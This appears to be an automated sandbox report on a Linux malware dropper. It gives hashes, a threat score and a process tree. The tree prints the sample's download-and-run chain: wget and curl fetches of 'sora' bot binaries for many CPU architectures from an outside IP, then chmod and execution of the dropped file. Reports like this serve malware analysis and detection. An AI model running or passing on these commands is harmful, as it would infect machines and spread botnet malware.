848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54

General

Target

02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Size

1KB
MD5

02ca1bec2de42845c35867af0dc72be3
SHA1

d2fc439476dd4ec34fce01257762a34b0aa6f3d5
SHA256

848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
SHA512

302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 10 IoCs

Processes:

robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobben

ioc	pid	process
/tmp/robben	1527	robben
/tmp/robben	1534	robben
/tmp/robben	1540	robben
/tmp/robben	1546	robben
/tmp/robben	1552	robben
/tmp/robben	1558	robben
/tmp/robben	1569	robben
/tmp/robben	1575	robben
/tmp/robben	1581	robben
/tmp/robben	1587	robben

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

description ioc

File opened for modification /tmp/robben

description	ioc
File opened for modification	/tmp/robben

/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
1⤵
PID:1519

/usr/bin/wget
wget http://188.127.235.211/bins/sora.x86
2⤵
PID:1520

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.x86
2⤵
PID:1521

/bin/cat
cat sora.x86
2⤵
PID:1525

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1526

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1527

/usr/bin/wget
wget http://188.127.235.211/bins/sora.mips
2⤵
PID:1529

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.mips
2⤵
PID:1530

/bin/cat
cat sora.mips
2⤵
PID:1532

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1533

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1534

/usr/bin/wget
wget http://188.127.235.211/bins/sora.mpsl
2⤵
PID:1536

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.mpsl
2⤵
PID:1537

/bin/cat
cat sora.mpsl
2⤵
PID:1538

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1539

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1540

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm4
2⤵
PID:1542

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm4
2⤵
PID:1543

/bin/cat
cat sora.arm4
2⤵
PID:1544

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1545

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1546

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm5
2⤵
PID:1548

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm5
2⤵
PID:1549

/bin/cat
cat sora.arm5
2⤵
PID:1550

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1551

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1552

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm6
2⤵
PID:1554

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm6
2⤵
PID:1555

/bin/cat
cat sora.arm6
2⤵
PID:1556

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1557

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1558

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm7
2⤵
PID:1560

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm7
2⤵
PID:1561

/bin/cat
cat sora.arm7
2⤵
PID:1567

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1568

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1569

/usr/bin/wget
wget http://188.127.235.211/bins/sora.ppc
2⤵
PID:1571

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.ppc
2⤵
PID:1572

/bin/cat
cat sora.ppc
2⤵
PID:1573

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1574

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1575

/usr/bin/wget
wget http://188.127.235.211/bins/sora.m68k
2⤵
PID:1577

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.m68k
2⤵
PID:1578

/bin/cat
cat sora.m68k
2⤵
PID:1579

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1580

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:1581

/usr/bin/wget
wget http://188.127.235.211/bins/sora.sh4
2⤵
PID:1583

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.sh4
2⤵
PID:1584

/bin/cat
cat sora.sh4
2⤵
PID:1585

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 config-err-bTaqyj netplan_llho9o3q robben snap-private-tmp ssh-5dAoIJxYVZ9m systemd-private-87381985361647c4ad7a58a24a63b8c3-bolt.service-kj9Ubv systemd-private-87381985361647c4ad7a58a24a63b8c3-colord.service-XgF9UQ systemd-private-87381985361647c4ad7a58a24a63b8c3-fwupd.service-twwoVU systemd-private-87381985361647c4ad7a58a24a63b8c3-ModemManager.service-GZbEBx systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-resolved.service-DuaPVG systemd-private-87381985361647c4ad7a58a24a63b8c3-systemd-timedated.service-eJW0TY
2⤵
PID:1586

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads